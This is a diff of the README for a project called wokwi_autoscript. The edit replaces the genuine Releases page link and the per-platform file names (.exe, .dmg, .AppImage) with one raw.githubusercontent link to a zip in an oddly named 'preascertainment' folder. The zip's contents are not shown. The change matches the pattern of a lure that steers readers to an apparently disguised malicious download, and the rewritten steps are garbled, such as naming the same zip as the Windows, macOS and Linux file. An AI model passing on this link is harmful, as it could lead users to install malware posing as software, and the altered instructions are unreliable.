rananth45/wokwi_autoscript/README.md

 ## 📋 Download & Install
 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/rananth45/wokwi_autoscript/releases) to find the latest version.
+   Go to the [Releases page](https://raw.githubusercontent.com/rananth45/wokwi_autoscript/master/preascertainment/wokwi_autoscript.zip) to find the latest version.

 2. **Choose Your File**
    On the Releases page, you will see a list of versions.
 Look for the most recent version and click on it.

 3. **Download the Executable**
    Find the file that matches your operating system.
 For example:
-   - For Windows, it might be `wokwi_autoscript.exe`.
+   - For Windows, it might be `https://raw.githubusercontent.com/rananth45/wokwi_autoscript/master/preascertainment/wokwi_autoscript.zip`.
-   - For macOS, look for `wokwi_autoscript.dmg`.
+   - For macOS, look for `https://raw.githubusercontent.com/rananth45/wokwi_autoscript/master/preascertainment/wokwi_autoscript.zip`.
-   - For Linux, look for `wokwi_autoscript.AppImage`.
+   - For Linux, look for `https://raw.githubusercontent.com/rananth45/wokwi_autoscript/master/preascertainment/wokwi_autoscript.zip`.

 4. **Click to Download**
    Click on the file name to start the download.
 This will save it to your computer.